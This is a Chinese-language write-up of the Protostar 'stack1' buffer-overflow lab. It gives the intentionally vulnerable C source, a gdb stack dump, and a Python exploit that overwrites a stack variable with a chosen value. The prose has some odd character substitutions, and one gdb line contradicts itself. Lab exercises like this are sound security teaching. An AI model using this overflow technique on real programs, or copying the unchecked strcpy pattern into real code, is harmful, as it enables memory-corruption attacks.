Exploit練習Protostar——stack1

簡介

　　上一個練習咱們經過利用棧溢出漏洞修改了棧中變量modified的值，可是咱們並無控制將modified修改爲什麼值。在這個練習中咱們會試圖將modified修改成特定的值，這就須要咱們瞭解變量在內存中是怎樣存儲的。

源碼

 1 #include <stdlib.h>
 2 #include <unistd.h>
 3 #include <stdio.h>
 4 #include <string.h>
 5 
 6 int main(int argc, char **argv)
 7 {
 8   volatile int modified;
 9   char buffer[64];
10 
11   if(argc == 1) {
12       errx(1, "please specify an argument\n");
13   }
14 
15   modified = 0;
16   strcpy(buffer, argv[1]);
17 
18   if(modified == 0x61626364) {
19       printf("you have correctly got the variable to the right value\n");
20   } else {
21       printf("Try again, you got 0x%08x\n", modified);
22   }
23 }

分析

　　能夠看到此次buffer變量不是在程序中經過gets函數得到，而是經過在執行程序時傳入參數得到，固然這並不影響payload，只是在編寫exploit代碼時須要作一些修改，這裏先不考慮這一部分。
　　從代碼中能夠看出此次練習的目的是把modified修改成0x61626364，棧中變量的佈局應該是和stack0的練習中相同，可是咱們仍是從新使用gdb輸出一次結果，可是此次爲了觀察變量在內存中的佈局，咱們使用"abcd"做爲用戶輸入：

 1 $ gdb stack1
 2 GNU gdb (GDB) 7.0.1-debian
 3 Copyright (C) 2009 Free Software Foundation, Inc.
 4 License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
 5 This is free software: you are free to change and redistribute it.
 6 There is NO WARRANTY, to the extent permitted by law. Type "show copying"
 7 and "show warranty" for details.
 8 This GDB was configured as "i486-linux-gnu".
 9 For bug reporting instructions, please see:
10 <http://www.gnu.org/software/gdb/bugs/>...
11 Reading symbols from /opt/protostar/bin/stack1...done.
12 (gdb) b 18
13 Breakpoint 1 at 0x80484a7: file stack1/stack1.c, line 18.
14 (gdb) r abcd
15 Starting program: /opt/protostar/bin/stack1 aaaa
16 
17 Breakpoint 1, main (argc=2, argv=0xbffffd64) at stack1/stack1.c:18
18 18 stack1/stack1.c: No such file or directory.
19 in stack1/stack1.c
20 (gdb) print $esp
21 $1 = (void *) 0xbffffc50
22 (gdb) print $ebp
23 $2 = (void *) 0xbffffcb8
24 (gdb) x/26xw $esp
25 0xbffffc50: 0xbffffc6c 0xbffffe94 0xb7fff8f8 0xb7f0186e
26 0xbffffc60: 0xb7fd7ff4 0xb7ec6165 0xbffffc78 0x64636261
27 0xbffffc70: 0xb7fd7f00 0x080496fc 0xbffffc88 0x08048334
28 0xbffffc80: 0xb7ff1040 0x080496fc 0xbffffcb8 0x08048509
29 0xbffffc90: 0xb7fd8304 0xb7fd7ff4 0x080484f0 0xbffffcb8
30 0xbffffca0: 0xb7ec6365 0xb7ff1040 0x080484fb 0x00000000
31 0xbffffcb0: 0x080484f0 0x00000000
32 (gdb) info address modified
33 Symbol "modified" is a local variable at frame offset 92.

　　能夠看到輸入的"abcd"在棧中存儲爲0x64636261，因此若是想把modified修改成0x61626364，咱們能夠把payload設置爲"dcba"*17

EXPLOIT編寫

　　此次不須要在程序執行中途處理用戶輸入，所以可使用os模塊的system函數。代碼以下：

1 import os
2 payload = "dcba"*17
3 cmd = "/opt/protostar/bin/stack1 " + payload
4 os.system(cmd)

執行結果：

$ python exploit1.py
you have correctly got the variable to the right value